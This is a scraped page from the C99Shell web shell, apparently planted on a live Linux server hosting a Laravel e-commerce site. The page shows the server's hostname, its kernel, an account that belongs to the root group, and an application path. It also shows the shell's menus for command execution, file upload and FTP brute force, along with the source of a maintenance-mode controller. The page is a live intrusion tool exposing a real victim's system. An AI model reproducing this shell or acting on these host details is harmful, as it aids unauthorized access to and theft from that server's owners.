!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/app/Http/Controllers/   drwxr-xr-x
Free 27.23 GB of 117.98 GB (23.08%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     MaintenanceModeController.php (1.5 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * @package CaptchaConfigurationController
 * @author TechVillage <support@techvill.org>
 * @contributor Sakawat Hossain Rony <[sakawat.techvill@gmail.com]>
 * @created 29-07-2021
 */
namespace App\Http\Controllers;

use 
App\Http\Controllers\Controller;
use 
Illuminate\Http\Request;
use 
Illuminate\Support\Facades\Artisan;

class 
MaintenanceModeController extends Controller
{

    public function 
__construct(Request $request)
    {
        
//this middleware should be for POST request only
        
if ($request->isMethod('post')) {
            
$this->middleware('checkForDemoMode')->only('enable');
        }
    }


    public function 
enable(Request $request)
    {
        
$data = [
            
'list_menu' => 'maintenance'
        
];

        if (
$request->isMethod('post')) {

            if (
$request->maintenance == 'true') {
                
$secret \Str::random(20);

                
Artisan::call('down', ['--secret' => $secret]);

                
\Session::flash('success'__('Maintenance mode successfully updated.'));

                return 
redirect('admin/maintenance-mode?bypass_key=' $secret);

            } else {
                
Artisan::call('up');
            }
        }

        if (
app()->isDownForMaintenance()) {
            
$maintenance json_decode(file_get_contents(storage_path() . '/framework/down'), true);
            
$data['secret'] = $maintenance['secret'];
        }

        return 
view('admin.maintenance.index'$data);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0058 ]--